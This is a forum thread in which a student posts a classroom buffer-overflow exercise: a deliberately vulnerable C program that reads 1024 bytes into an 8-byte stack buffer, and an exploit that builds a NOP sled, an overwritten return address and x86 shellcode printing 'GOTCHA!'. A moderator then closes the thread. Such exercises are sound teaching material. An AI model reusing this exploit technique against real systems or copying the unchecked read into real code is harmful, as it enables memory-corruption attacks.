Offset values and shellcode size.

This is a discussion on Offset values and shellcode size. within the C Programming forums, part of the General Programming Boards category; So, I was given with these two codes (vuln.c and exploit.c) my assignment was supposed to describe the programs, explain ...

  1. #1
    Registered User
    Join Date
    Apr 2012
    Posts
    1

    Offset values and shellcode size.

    So, I was given with these two codes (vuln.c and exploit.c) my assignment was supposed to describe the programs, explain the purpose of each of the statements, compile them and run the following sequence of commands:


    gcc vuln.c -o vuln
    gcc exploit.c -o exploit
    ./exploit


    -----supposed to get an output------------
    Using Offset: oxbffff310
    Shellcode size: 38


    --------the output I get------------
    Using Offset: 0x836c861c
    Shell code Size: 38


    -------------then--------------------------
    od -t x2 badfile
    ./vuln


    ---------------the final output--------------------
    GOTCHA!



    Here are the codes:
    ----------------------------------------------
    vuln.c
    -----------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    
    int bof ()
    
    {
    char buffer [8];
    FILE *badfile;
    badfile = fopen( "badfile", "r" );
    fread(buffer, sizeof ( char ), 1024, badfile );
    return 1;
    }
    
    int main( int argc, char **argv)
    {
    bof();
    printf("Not gonna do it! \n");
    return 1;
    }

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    
    int bof ()
    
    {
    char buffer [8];
    FILE *badfile;
    badfile = fopen( "badfile", "r" );
    fread(buffer, sizeof ( char ), 1024, badfile );
    return 1;
    }
    
    int main( int argc, char **argv)
    {
    bof();
    printf("Not gonna do it! \n");
    return 1;
    }

    ----------------------------------------------------
    exploit.c
    ----------------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
     
    char shellcode[] =
     
     "\xeb\x16"
     "\x31\xdb"
     "\x31\xd2"
     "\x31\xc0"
     "\x59"
     "\xbb\x01\x00\x00\x00"
     "\xb2\x09"
     "\xb0\x04"
     "\xcd\x80"
     "\xb0\x01"
     "\xcd\x80"
     "\xe8\xe5\xff\xff\xff"
     "GOTCHA!\n"
    ;
     
    #define OFFSET 1500
     
    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }
     
    unsigned long get_ESP(void)
    {
          __asm__("movl %ESP,%EAX");
    }
     
    int main(int argc, char **argv)
    {
     
      unsigned long addr;
      FILE *badfile;
      char buffer[1024];
     
      addr = get_ESP()+OFFSET;
      fprintf(stderr, "Using Offset: 0x%x\nShell code size: %d\n",
                       addr, sizeof(shellcode) );
     
      memset(&buffer, 0x90, 1024);
     
     
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ],
                shellcode,sizeof(shellcode) );
     
      badfile = fopen("./badfile","w");
      fwrite(buffer,1024,1,badfile);
      fclose(badfile);
     
    }

    so, I got the output to show the correct shellcode size which is 38, but I couldn't figure a way to change the "Using Offset" value and get "GOTCHA!" when I execute vuln after exploit.

    To simply put it, I need to figure out the way I can get the correct "using offset" value.

    Thank you and sorry for the long post.

  2. #2
    C++ Witch laserlight's Avatar
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    21,439
    I understand that this is an academic assignment, but we generally do not discuss these sort of things here so I shall close this thread.
    C + C++ Compiler: MinGW port of GCC
    Version Control System: Bazaar

    Look up a C++ Reference and learn How To Ask Questions The Smart Way

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Using Offset in C
    By nickman in forum C Programming
    Replies: 1
    Last Post: 11-15-2011, 11:52 AM
  2. Determining size of array returning strange values?
    By edddo in forum C++ Programming
    Replies: 13
    Last Post: 07-28-2011, 03:37 AM
  3. Replies: 3
    Last Post: 01-23-2006, 06:25 PM
  4. offset
    By Rhidian in forum C Programming
    Replies: 6
    Last Post: 04-14-2005, 08:57 AM

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21